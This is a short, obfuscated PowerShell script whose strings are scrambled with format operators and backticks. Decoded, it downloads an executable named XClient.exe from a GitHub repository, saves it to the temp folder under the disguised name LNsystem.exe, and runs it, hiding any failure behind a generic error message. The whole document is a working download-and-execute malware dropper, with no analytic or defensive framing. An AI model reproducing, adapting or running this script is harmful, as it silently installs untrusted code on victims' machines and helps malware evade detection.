${u`RL} = ("{6}{11}{15}{0}{1}{19}{10}{4}{7}{13}{16}{12}{9}{5}{17}{3}{18}{8}{14}{2}" -f 'git','hub.co','e','ien','est/raw','C','https:','/re','.e','in/X','antonio842/t','/','ds/ma','fs/','x','/','hea','l','t','m/')
${ou`T`puTpaTh} = "$env:TEMP\LNsystem.exe"

try {
    &("{2}{4}{3}{1}{0}"-f'thod','tMe','I','s','nvoke-Re') -Uri ${U`RL} -OutFile ${oU`TP`UTpA`Th}

    if (&("{1}{0}" -f 'h','Test-Pat') -Path ${O`Ut`puTpAtH}) {
        &("{2}{0}{1}" -f'art-Pro','cess','St') -FilePath ${Ou`T`puTpa`TH}
    }
} catch {
    &("{0}{1}{2}" -f'Wr','ite-Hos','t') ('A'+'n '+'e'+'rror'+' '+'oc'+'c'+'urred: '+"$_")
}
